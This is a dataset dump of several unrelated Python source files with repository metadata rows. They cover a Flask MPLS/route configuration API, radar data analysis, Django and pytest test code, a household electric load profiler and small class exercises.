from encapsulator.userspace import *
#Configured with StubAPI's constructor
CLIENT_FLASK_HOST = ""
CLIENT_FLASK_PORT = ""
class ClientAPI:
#Flask method's can't be defined in a class
#Configuration parameters are set as global variables through this class
def __init__(self, host, port):
global DEBUG, CLIENT_FLASK_HOST, CLIENT_FLASK_PORT
CLIENT_FLASK_HOST = host
CLIENT_FLASK_PORT = port
#Runs the flask server in a thread
def run_client_server():
global app
if not conf.debug:
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
app.run(host=CLIENT_FLASK_HOST, port=CLIENT_FLASK_PORT)
#Get new destination / stack association
@app.route('/path', methods=['POST'])
def add_destination():
data = request.json
new = mpls_stack()
for val in data["stack"]:
new.add_label(val)
print("New path %s -> %s, stack: %s, size: %d" % (data["src"], data["dst"], new, new.size) )
src = ip2int(data["src"])
dst = ip2int(data["dst"])
conf.destinations.append((src,dst))
conf.encap.map_inject(src, dst, new)
return "OK"
#Delete destination
@app.route('/path', methods=['DELETE'])
def del_destination():
data = request.json
print("Deleting path %s -> %s" % (data["src"], data["dst"]) )
src = ip2int(data["src"])
dst = ip2int(data["dst"])
if (src,dst) in conf.destinations:
conf.destinations.remove((src, dst))
conf.encap.map_remove(src, dst)
return "OK"
#Get new ip route
@app.route('/route', methods=['POST'])
def new_route():
data = request.json
set_route(conf.interface, data["subnet"])
conf.installed_subnets.append(data["subnet"])
return "OK"
#Remove ip route
@app.route('/route', methods=['DELETE'])
def del_route():
data = request.json
remove_route(data["subnet"])
if data["subnet"] in conf.installed_subnets:
conf.installed_subnets.remove(data["subnet"])
return "OK"
#Get new static arp
@app.route('/arp', methods=['POST'])
def new_arp():
data = request.json
set_arp(conf.interface, data["ip"], data["mac"])
conf.installed_ips.append(data["ip"])
return "OK"
#Remove static arp
@app.route('/arp', methods=['DELETE'])
def del_arp():
data = request.json
remove_arp(conf.interface, data["ip"])
if data["ip"] in conf.installed_ips:
conf.installed_ips.remove(data["ip"])
return "OK"
#Get new ip
@app.route('/ip', methods=['POST'])
def new_ip():
data = request.json
set_ip(conf.interface, data["ip"])
return "OK"
#Remove static arp
@app.route('/ip', methods=['DELETE'])
def del_ip():
data = request.json
remove_ip(conf.interface, data["ip"])
return "OK" | 24.766667 | 96 | 0.659825 | 418 | 2,972 | 4.569378 | 0.253589 | 0.046073 | 0.062827 | 0.039791 | 0.231937 | 0.174346 | 0.095288 | 0.072251 | 0.038743 | 0 | 0 | 0.002082 | 0.19179 | 2,972 | 120 | 97 | 24.766667 | 0.793089 | 0.131898 | 0 | 0.25 | 0 | 0 | 0.091936 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.1 | 0 | 0.3375 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb4d5f68daee5cc9ce1c6b5d3a404612daf578b0 | 1,225 | py | Python | tests/getHighIntensityRegionEdgeTest.py | yaukwankiu/armor | 6c57df82fe3e7761f43f9fbfe4f3b21882c91436 | [
"CC0-1.0"
] | 1 | 2015-11-06T06:41:33.000Z | 2015-11-06T06:41:33.000Z | tests/getHighIntensityRegionEdgeTest.py | yaukwankiu/armor | 6c57df82fe3e7761f43f9fbfe4f3b21882c91436 | [
"CC0-1.0"
] | null | null | null | tests/getHighIntensityRegionEdgeTest.py | yaukwankiu/armor | 6c57df82fe3e7761f43f9fbfe4f3b21882c91436 | [
"CC0-1.0"
] | null | null | null | import itertools
from armor import pattern
from armor import objects4 as ob
outputFolder = '/media/TOSHIBA EXT/ARMOR/labLogs2/charts2_local_features_distribution/misc/'
def getXY(a, name='', thres=thres):
a1 = a.levelSet(thres)
a1.show()
I, J = np.where(a.matrix==thres)
I = I.compressed()
J = J.compressed()
X, Y = J, I
coords = [(X[i], Y[i]) for i in range(len(X))]
coordsString = '\n'.join([ str(X[i]) + " " + str(Y[i]) for i in range(len(X))])
fileName = 'coords' + str(thres) + name + "_"+ str(int(time.time()))+'.dat'
open(outputFolder+ fileName, 'w').write(coordsString)
print "changes written to ", fileName
return {'X': X, "Y": Y}
thres = 35
a= pattern.a
a.load()
getXY(a, a.name, thres)
thres = 20
wrf = ob.kongreywrf2
wrf.fix()
#k = wrf[212].load()
ks = [v for v in wrf if v.dataTime =='20130829.1200']
k = ks[13]
k.above(thres-0.1).connectedComponents().show()
k1 = k.above(thres-0.1).connectedComponents()
k1.levelSet(2).show()
k2 = k1.levelSet(2) * k.levelSet(20)
k2.setMaxMin()
k2.show()
k3 = k1.levelSet(2)
k_ = k*-1
k_ = k_.above(-thres-0.1)
k4 = k_ * k3
k4.setMaxMin()
k4.show()
k4.matrix.sum()
d = getXY(k4, k.name + "threshold20_", 2)
| 24.019608 | 92 | 0.62449 | 200 | 1,225 | 3.78 | 0.415 | 0.02381 | 0.043651 | 0.047619 | 0.146825 | 0.12963 | 0.044974 | 0.044974 | 0 | 0 | 0 | 0.055833 | 0.181224 | 1,225 | 50 | 93 | 24.5 | 0.697906 | 0.01551 | 0 | 0 | 0 | 0 | 0.113693 | 0.049793 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.075 | null | null | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb4daa67b3a7c1bebded6811d734bba3fae430ae | 105 | py | Python | wcics/mail/errors.py | CS-Center/CS-Center | 3cd09f29d214406e6618fc67b9faf59a18f3f11b | [
"MIT"
] | null | null | null | wcics/mail/errors.py | CS-Center/CS-Center | 3cd09f29d214406e6618fc67b9faf59a18f3f11b | [
"MIT"
] | 6 | 2019-12-06T18:06:28.000Z | 2021-12-01T20:19:05.000Z | wcics/mail/errors.py | CS-Center/CS-Center | 3cd09f29d214406e6618fc67b9faf59a18f3f11b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
class MailError(Exception):
def __init__(self, addrs):
self.failed = addrs | 21 | 28 | 0.647619 | 13 | 105 | 4.923077 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011628 | 0.180952 | 105 | 5 | 29 | 21 | 0.732558 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 4 |
bb4ee9418756d227fb920b5482b1a70d72f470a7 | 5,163 | py | Python | tests/test_cli.py | epandurski/swpt_creditors | 35b9c6fa8ec84fe26e203a2604aff9cd5280dc4c | [
"MIT"
] | null | null | null | tests/test_cli.py | epandurski/swpt_creditors | 35b9c6fa8ec84fe26e203a2604aff9cd5280dc4c | [
"MIT"
] | null | null | null | tests/test_cli.py | epandurski/swpt_creditors | 35b9c6fa8ec84fe26e203a2604aff9cd5280dc4c | [
"MIT"
] | 1 | 2020-01-16T13:24:31.000Z | 2020-01-16T13:24:31.000Z | import logging
from datetime import date, timedelta
from swpt_creditors import procedures as p
from swpt_creditors import models as m
D_ID = -1
C_ID = 4294967296
def _create_new_creditor(creditor_id: int, activate: bool = False):
creditor = p.reserve_creditor(creditor_id)
if activate:
p.activate_creditor(creditor_id, creditor.reservation_id)
def test_process_ledger_entries(app, db_session, current_ts):
_create_new_creditor(C_ID, activate=True)
p.create_new_account(C_ID, D_ID)
params = {
'debtor_id': D_ID,
'creditor_id': C_ID,
'creation_date': date(2020, 1, 1),
'last_change_ts': current_ts,
'last_change_seqnum': 1,
'principal': 1000,
'interest': 0.0,
'interest_rate': 5.0,
'last_interest_rate_change_ts': current_ts,
'transfer_note_max_bytes': 500,
'last_config_ts': current_ts,
'last_config_seqnum': 1,
'negligible_amount': 0.0,
'config_flags': 0,
'config_data': '',
'account_id': str(C_ID),
'debtor_info_iri': 'http://example.com',
'debtor_info_content_type': None,
'debtor_info_sha256': None,
'last_transfer_number': 0,
'last_transfer_committed_at': current_ts,
'ts': current_ts,
'ttl': 100000,
}
p.process_account_update_signal(**params)
params = {
'debtor_id': D_ID,
'creditor_id': C_ID,
'creation_date': date(2020, 1, 1),
'transfer_number': 1,
'coordinator_type': 'direct',
'sender': '666',
'recipient': str(C_ID),
'acquired_amount': 200,
'transfer_note_format': 'json',
'transfer_note': '{"message": "test"}',
'committed_at': current_ts,
'principal': 200,
'ts': current_ts,
'previous_transfer_number': 0,
'retention_interval': timedelta(days=5),
}
p.process_account_transfer_signal(**params)
params['transfer_number'] = 2
params['principal'] = 400
params['previous_transfer_number'] = 1
p.process_account_transfer_signal(**params)
assert len(p.get_account_ledger_entries(C_ID, D_ID, prev=10000, count=10000)) == 0
runner = app.test_cli_runner()
result = runner.invoke(args=['swpt_creditors', 'process_ledger_updates', '--burst=1', '--quit-early', '--wait=0'])
assert not result.output
assert len(p.get_account_ledger_entries(C_ID, D_ID, prev=10000, count=10000)) == 2
def test_process_log_additions(app, db_session, current_ts):
_create_new_creditor(C_ID, activate=True)
p.create_new_account(C_ID, D_ID)
latest_update_id = p.get_account_config(C_ID, D_ID).config_latest_update_id
p.update_account_config(
creditor_id=C_ID,
debtor_id=D_ID,
is_scheduled_for_deletion=True,
negligible_amount=1e30,
allow_unsafe_deletion=False,
latest_update_id=latest_update_id + 1,
)
entries1, _ = p.get_log_entries(C_ID, count=10000)
runner = app.test_cli_runner()
result = runner.invoke(args=['swpt_creditors', 'process_log_additions', '--wait=0', '--quit-early'])
assert result.exit_code == 0
assert not result.output
entries2, _ = p.get_log_entries(C_ID, count=10000)
assert len(entries2) > len(entries1)
def test_configure_interval(app, db_session, current_ts, caplog):
caplog.at_level(logging.ERROR)
ac = m.AgentConfig.query.one_or_none()
if ac and ac.min_creditor_id == m.MIN_INT64:
min_creditor_id = m.MIN_INT64 + 1
max_creditor_id = m.MAX_INT64
else:
min_creditor_id = m.MIN_INT64
max_creditor_id = m.MAX_INT64
runner = app.test_cli_runner()
caplog.clear()
result = runner.invoke(args=[
'swpt_creditors', 'configure_interval', '--', str(m.MIN_INT64 - 1), '-1'])
assert result.exit_code != 0
assert 'not a valid creditor ID' in caplog.text
caplog.clear()
result = runner.invoke(args=[
'swpt_creditors', 'configure_interval', '--', '1', str(m.MAX_INT64 + 1)])
assert result.exit_code != 0
assert 'not a valid creditor ID' in caplog.text
caplog.clear()
result = runner.invoke(args=[
'swpt_creditors', 'configure_interval', '--', '2', '1'])
assert result.exit_code != 0
assert 'invalid interval' in caplog.text
caplog.clear()
result = runner.invoke(args=[
'swpt_creditors', 'configure_interval', '--', '-1', '1'])
assert result.exit_code != 0
assert 'contains 0' in caplog.text
caplog.clear()
result = runner.invoke(args=[
'swpt_creditors', 'configure_interval', '--', '1', str(max_creditor_id)])
assert result.exit_code == 0
assert not result.output
ac = m.AgentConfig.query.one()
assert ac.min_creditor_id == 1
assert ac.max_creditor_id == max_creditor_id
caplog.clear()
result = runner.invoke(args=[
'swpt_creditors', 'configure_interval', '--', str(min_creditor_id), '-1'])
assert result.exit_code == 0
assert not result.output
ac = m.AgentConfig.query.one()
assert ac.min_creditor_id == min_creditor_id
assert ac.max_creditor_id == -1
| 34.192053 | 118 | 0.654852 | 694 | 5,163 | 4.54611 | 0.213256 | 0.066561 | 0.012678 | 0.055784 | 0.533122 | 0.487797 | 0.430745 | 0.42187 | 0.395246 | 0.381933 | 0 | 0.035608 | 0.216734 | 5,163 | 150 | 119 | 34.42 | 0.74456 | 0 | 0 | 0.366412 | 0 | 0 | 0.200077 | 0.037188 | 0 | 0 | 0 | 0 | 0.167939 | 1 | 0.030534 | false | 0 | 0.030534 | 0 | 0.061069 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb4f9fcdd845899468417c334c142d81c1bbc6d8 | 888 | py | Python | pajbot/web/routes/base/playsounds.py | KasperHelsted/pajbot | c366dcfc5e6076f9adcfce24c7a666653068b031 | [
"MIT"
] | null | null | null | pajbot/web/routes/base/playsounds.py | KasperHelsted/pajbot | c366dcfc5e6076f9adcfce24c7a666653068b031 | [
"MIT"
] | null | null | null | pajbot/web/routes/base/playsounds.py | KasperHelsted/pajbot | c366dcfc5e6076f9adcfce24c7a666653068b031 | [
"MIT"
] | 1 | 2020-03-11T19:37:10.000Z | 2020-03-11T19:37:10.000Z | from flask import render_template
from pajbot.managers.db import DBManager
from pajbot.models.module import Module
from pajbot.models.playsound import Playsound
from pajbot.modules import PlaysoundModule
def init(app):
@app.route("/playsounds/")
def user_playsounds():
with DBManager.create_session_scope() as session:
playsounds = session.query(Playsound).filter(Playsound.enabled).all()
playsound_module = session.query(Module).filter(Module.id == PlaysoundModule.ID).one_or_none()
enabled = False
if playsound_module is not None:
enabled = playsound_module.enabled
return render_template(
"playsounds.html",
playsounds=playsounds,
module_settings=PlaysoundModule.module_settings(),
playsounds_enabled=enabled,
)
| 34.153846 | 106 | 0.665541 | 92 | 888 | 6.282609 | 0.434783 | 0.069204 | 0.055363 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.256757 | 888 | 25 | 107 | 35.52 | 0.875758 | 0 | 0 | 0 | 0 | 0 | 0.030405 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.25 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb50ddc7c9fdf4690ca7e9bb60ec4a0df3dd0ba9 | 1,542 | py | Python | cla_backend/apps/timer/tests/test_managers.py | uk-gov-mirror/ministryofjustice.cla_backend | 4d524c10e7bd31f085d9c5f7bf6e08a6bb39c0a6 | [
"MIT"
] | 3 | 2019-10-02T15:31:03.000Z | 2022-01-13T10:15:53.000Z | cla_backend/apps/timer/tests/test_managers.py | uk-gov-mirror/ministryofjustice.cla_backend | 4d524c10e7bd31f085d9c5f7bf6e08a6bb39c0a6 | [
"MIT"
] | 206 | 2015-01-02T16:50:11.000Z | 2022-02-16T20:16:05.000Z | cla_backend/apps/timer/tests/test_managers.py | uk-gov-mirror/ministryofjustice.cla_backend | 4d524c10e7bd31f085d9c5f7bf6e08a6bb39c0a6 | [
"MIT"
] | 6 | 2015-03-23T23:08:42.000Z | 2022-02-15T17:04:44.000Z | from django.test import TestCase
from django.utils import timezone
from django.db import IntegrityError
from django.core.exceptions import MultipleObjectsReturned
from core.tests.mommy_utils import make_recipe, make_user
from timer.models import Timer
class RunningTimerManagerTestCase(TestCase):
def test_query_set(self):
timer1 = make_recipe("timer.Timer", stopped=None)
make_recipe("timer.Timer", stopped=timezone.now())
timer3 = make_recipe("timer.Timer", stopped=None)
make_recipe("timer.Timer", cancelled=True)
timers = Timer.running_objects.all()
self.assertItemsEqual(timers, [timer1, timer3])
def test_get_by_user_fails_with_multiple_timers(self):
try:
user = make_user()
make_recipe("timer.Timer", stopped=None, created_by=user, _quantity=2)
Timer.running_objects.get_by_user(user)
except (MultipleObjectsReturned, IntegrityError):
pass
else:
self.assertTrue(False, "It should raise MultipleObjectsReturned or IntegrityError")
def test_get_by_user_fails_when_no_timer(self):
user = make_user()
make_recipe("timer.Timer", stopped=timezone.now(), created_by=user)
self.assertRaises(IndexError, Timer.running_objects.get_by_user, user)
def test_get_by_user_returns_timer(self):
user = make_user()
timer = make_recipe("timer.Timer", stopped=None, created_by=user)
self.assertEqual(Timer.running_objects.get_by_user(user), timer)
| 35.860465 | 95 | 0.713359 | 191 | 1,542 | 5.507853 | 0.319372 | 0.051331 | 0.09981 | 0.13308 | 0.431559 | 0.387833 | 0.347909 | 0.229087 | 0.180608 | 0.096958 | 0 | 0.004026 | 0.194553 | 1,542 | 42 | 96 | 36.714286 | 0.842995 | 0 | 0 | 0.096774 | 0 | 0 | 0.0869 | 0.014916 | 0 | 0 | 0 | 0 | 0.129032 | 1 | 0.129032 | false | 0.032258 | 0.193548 | 0 | 0.354839 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb51cff9c7fd98ea2e3be2188c9165fb1f513dcf | 372 | py | Python | 02-python-oo/aula-05/exemplos/train.py | opensanca/trilha-python | 9ffadd266e22a920a3c1acfdbc6a5a4645fce9d6 | [
"MIT"
] | 47 | 2016-05-19T22:37:18.000Z | 2022-02-22T02:34:18.000Z | 02-python-oo/aula-05/exemplos/train.py | opensanca/trilha-python | 9ffadd266e22a920a3c1acfdbc6a5a4645fce9d6 | [
"MIT"
] | 21 | 2016-05-20T12:35:25.000Z | 2016-07-26T00:23:33.000Z | 02-python-oo/aula-05/exemplos/train.py | lamenezes/python-intro | 9ffadd266e22a920a3c1acfdbc6a5a4645fce9d6 | [
"MIT"
] | 25 | 2016-05-19T22:52:32.000Z | 2022-01-08T15:15:36.000Z | """
Cria uma classe trem que possui carros. O trem é iterável e cada elemento
retornado pela iteração retorna um sring com o número do carro.
"""
class Train:
def __init__(self, cars):
self.cars = cars
def __len__(self): # len(train)
return self.cars
def __iter__(self):
return ('car #{}'.format(i + 1) for i in range(self.cars))
| 23.25 | 73 | 0.642473 | 56 | 372 | 4.053571 | 0.696429 | 0.140969 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003597 | 0.252688 | 372 | 15 | 74 | 24.8 | 0.81295 | 0.400538 | 0 | 0 | 0 | 0 | 0.032558 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0.285714 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
bb52f0733efe5513920fdebfb1eef593a99fcd79 | 471 | py | Python | home/migrations/0003_auto_20210622_1116.py | screw-pack/hazel | ade9b6c6a396b3da2bb2d5505cfb63e1579cdab8 | [
"MIT"
] | null | null | null | home/migrations/0003_auto_20210622_1116.py | screw-pack/hazel | ade9b6c6a396b3da2bb2d5505cfb63e1579cdab8 | [
"MIT"
] | null | null | null | home/migrations/0003_auto_20210622_1116.py | screw-pack/hazel | ade9b6c6a396b3da2bb2d5505cfb63e1579cdab8 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.4 on 2021-06-22 09:16
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('home', '0002_auto_20210618_1545'),
]
operations = [
migrations.AlterModelOptions(
name='activity',
options={'ordering': ['start_time']},
),
migrations.AlterModelOptions(
name='agenda',
options={'ordering': ['entry']},
),
]
| 21.409091 | 49 | 0.562633 | 43 | 471 | 6.069767 | 0.790698 | 0.206897 | 0.237548 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094512 | 0.303609 | 471 | 21 | 50 | 22.428571 | 0.70122 | 0.095541 | 0 | 0.266667 | 1 | 0 | 0.169811 | 0.054245 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
bb52f288b0e795d00e5f3bf63b427429792a24ad | 9,486 | py | Python | house_load_profiler.py | gianmarco-lorenti/RECOpt | c7916861db033f9d917d05094102194202e3bb09 | [
"MIT"
] | 8 | 2021-03-08T09:30:16.000Z | 2022-02-18T19:40:41.000Z | house_load_profiler.py | gianmarco-lorenti/RECOpt | c7916861db033f9d917d05094102194202e3bb09 | [
"MIT"
] | null | null | null | house_load_profiler.py | gianmarco-lorenti/RECOpt | c7916861db033f9d917d05094102194202e3bb09 | [
"MIT"
] | 1 | 2021-05-24T13:21:36.000Z | 2021-05-24T13:21:36.000Z | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 28 18:37:58 2020
@author: giamm
"""
# from tictoc import tic, toc
import numpy as np
import datareader #routine created to properly read the files needed in the following
from load_profiler import load_profiler as lp
###############################################################################
# This file contains a method that, for a given household (considering its
# availability of each appliance considered in this study) returns the electric
# load profile for the household during one day (1440 min), with a resolution
# of 1 minute.
###############################################################################
########## Routine
def house_load_profiler(time_dict, apps_availability, day, season, appliances_data, **params):
''' The method returns a load profile for a given household in a total simulation time of 1440 min, with a timestep of 1 min.
Inputs:
apps_availability - 1d-array, availability of each appliance for the household is stored (1 if present, 0 if not)
day - str, type of day (weekday: 'wd'| weekend: 'we')
season - str, season (summer: 's', winter: 'w', autumn or spring: 'ap')
appliances_data - dict, various input data related to the appliances
params - dict, simulation parameters
Outputs:
house_load_profile - 1d-array, load profile for the household (W)
energy - 1d-array, energy consumed by each appliance in one day (Wh/day)
'''
## Time
# Time discretization for the simulation
# Time-step (min)
dt = time_dict['dt']
# Total time of simulation (min)
time = time_dict['time']
# Vector of time from 00:00 to 23:59 (one day) (min)
time_sim = time_dict['time_sim']
## Parameters
# Simulation parameters that can be changed from the user
# Contractual power for each household (W)
power_max = params['power_max']*1000
## Input data for the appliances
# Appliances' attributes, energy consumptions and user's coefficients
# apps is a 2d-array in which, for each appliance (rows) and attribute value is given (columns)
apps_ID = appliances_data['apps_ID']
# apps_attr is a dictionary in which the name of each attribute (value) is linked to its columns number in apps (key)
apps_attr = appliances_data['apps_attr']
## Household's load profile
# Generating the load profile for the house, considering which appliances are available
# Initializing the power vector for the load profile (W)
house_load_profile = np.zeros(np.shape(time_sim))
# Initializing the vector where to store the energy consumption from each appliance (Wh/day)
energy = np.zeros(len(apps_ID))
# Using the method load_profiler(lp) to get the load profile for each appliance
for app in apps_ID:
# The ID number of the appliance is stored in a variable since it will be used man times
app_ID = apps_ID[app][apps_attr['id_number']]
# Skipping appliances that are not present in the household
if apps_availability[app_ID] == 0:
continue
load_profile = lp(time_dict, app, day, season, appliances_data, **params) #load_profile has to outputs (time and power)
# In case the instantaneous power exceedes the maximum power, some tries
# are made in order to change the moment in which the next appliance is
# switched on (since it is evaluated randomly, according to the cumulative
# frequency of utilization for that appliance)
count = 0
maxtries = 10
duration_indices = np.size(load_profile[load_profile > 0])
while np.any(house_load_profile + load_profile > power_max) and count < maxtries:
switch_on_index = np.size((house_load_profile + load_profile)[house_load_profile + load_profile > power_max])
roll_step = int((duration_indices + switch_on_index)/2)
load_profile = np.roll(load_profile, roll_step)
count += 1
# Evaluating the energy consumption from each appliance by integrating
# the load profile over the time. Since the time is in minutes, the
# result is divided by 60 in order to obtain Wh.
energy[app_ID] = np.trapz(load_profile,time_sim)/60
# Injecting the power demand from each appliance into the load profile of the household
house_load_profile[:] = house_load_profile[:] + load_profile
# In case the which loop failed, the instantaneous power is saturated to the
# maximum power anyway. This may happen because the last appliance to be considered
# is the lighting, which is of "continuous" type, therefore its profile does
# not depend on a cumulative frequency (they are always on)
house_load_profile[house_load_profile > power_max] = power_max
return(house_load_profile,energy)
#####################################################################################################################
# ## Uncomment the following lines to test the function
# import matplotlib.pyplot as plt
# from tictoc import tic, toc
# # Time-step, total time and vector of time from 00:00 to 23:59 (one day) (min)
# dt = 1
# time = 1440
# time_sim = np.arange(0,time,dt)
# # Creating a dictionary to be passed to the various methods, containing the time discretization
# time_dict = {
# 'time': time,
# 'dt': dt,
# 'time_sim': time_sim,
# }
# apps, apps_ID, apps_attr = datareader.read_appliances('eltdome_report.csv',';','Input')
# ec_yearly_energy, ec_levels_dict = datareader.read_enclasses('classenerg_report.csv',';','Input')
# coeff_matrix, seasons_dict = datareader.read_enclasses('coeff_matrix.csv',';','Input')
# apps_avg_lps = {}
# apps_dcs = {}
# for app in apps_ID:
# # app_nickname is a 2 or 3 characters string identifying the appliance
# app_nickname = apps_ID[app][apps_attr['nickname']]
# # app_type depends from the work cycle for the appliance: 'continuous'|'no_duty_cycle'|'duty_cycle'|
# app_type = apps_ID[app][apps_attr['type']]
# # app_wbe (weekly behavior), different usage of the appliance in each type of days: 'wde'|'we','wd'
# app_wbe = apps_ID[app][apps_attr['week_behaviour']]
# # app_sbe (seasonal behavior), different usage of the appliance in each season: 'sawp'|'s','w','ap'
# app_sbe = apps_ID[app][apps_attr['season_behaviour']]
# # Building the name of the file to be opened and read
# fname_nickname = app_nickname
# fname_type = 'avg_loadprof'
# apps_avg_lps[app] = {}
# for season in app_sbe:
# fname_season = season
# for day in app_wbe:
# fname_day = day
# filename = '{}_{}_{}_{}.csv'.format(fname_type, fname_nickname, fname_day, fname_season)
# # Reading the time and power vectors for the load profile
# data_lp = datareader.read_general(filename,';','Input')
# # Time is stored in hours and converted to minutes
# time_lp = data_lp[:, 0]
# time_lp = time_lp*60
# # Power is already stored in Watts, it corresponds to the load profile
# power_lp = data_lp[:, 1]
# load_profile = power_lp
# # Interpolating the load profile if it has a different time-resolution
# if (time_lp[-1] - time_lp[0])/(np.size(time_lp) - 1) != dt:
# load_profile = np.interp(time_sim, time_lp, power_lp, period = time)
# apps_avg_lps[app][(season, day)] = load_profile
# if app_type == 'duty_cycle':
# fname_type = 'dutycycle'
# filename = '{}_{}.csv'.format(fname_type, fname_nickname)
# # Reading the time and power vectors for the duty cycle
# data_dc = datareader.read_general(filename, ';', 'Input')
# # Time is already stored in minutes
# time_dc = data_dc[:, 0]
# # Power is already stored in Watts, it corresponds to the duty cycle
# power_dc = data_dc[:, 1]
# duty_cycle = power_dc
# # Interpolating the duty-cycle, if it has a different time resolution
# if (time_dc[-1] - time_dc[0])/(np.size(time_dc) - 1) != dt:
# time_dc = np.arange(time_dc[0], time_dc[-1] + dt, dt)
# duty_cycle = np.interp(time_dc, power_dc)
# apps_dcs[app] = {'time_dc': time_dc,
# 'duty_cycle': duty_cycle}
# appliances_data = {
# 'apps': apps,
# 'apps_ID': apps_ID,
# 'apps_attr': apps_attr,
# 'ec_yearly_energy': ec_yearly_energy,
# 'ec_levels_dict': ec_levels_dict,
# 'coeff_matrix': coeff_matrix,
# 'seasons_dict': seasons_dict,
# 'apps_avg_lps': apps_avg_lps,
# 'apps_dcs': apps_dcs,
# }
# params = {
# 'power_max': 3,
# 'en_class': 'D',
# 'toll': 15,
# 'devsta': 2,
# 'ftg_avg': 100
# }
# apps_availability = np.ones(17)
# day = 'wd'
# season = 's'
# house_load_profile, energy = house_load_profiler(time_dict, apps_availability, day, season, appliances_data, **params)
# plt.bar(time_sim,house_load_profile,width=dt,align='edge')
# plt.show()
###################################################################################################################################### | 37.2 | 134 | 0.621969 | 1,267 | 9,486 | 4.479084 | 0.240726 | 0.073656 | 0.033833 | 0.011454 | 0.221322 | 0.170573 | 0.14185 | 0.09304 | 0.065903 | 0.052863 | 0 | 0.012665 | 0.242568 | 9,486 | 255 | 134 | 37.2 | 0.777175 | 0.731499 | 0 | 0 | 0 | 0 | 0.025065 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.103448 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb542cac2a03cdb3c031650c9fa28df93e7a1256 | 309 | py | Python | ex9-11.py | yiyidhuang/PythonCrashCrouse2nd | 3512f9ab8fcf32c6145604a37e2a62feddf174d1 | [
"MIT"
] | null | null | null | ex9-11.py | yiyidhuang/PythonCrashCrouse2nd | 3512f9ab8fcf32c6145604a37e2a62feddf174d1 | [
"MIT"
] | null | null | null | ex9-11.py | yiyidhuang/PythonCrashCrouse2nd | 3512f9ab8fcf32c6145604a37e2a62feddf174d1 | [
"MIT"
] | null | null | null | from admins import Admin, Privileges
eric = Admin('eric', 'matthes', 'e_mattches', 'e_mattches@example.com', 'alaska')
eric_privileges = [
'can reset passwords',
'can moderate discussions',
'can suspend accounts',
]
eric.privileges.privileges = eric_privileges
eric.privileges.show_privileges()
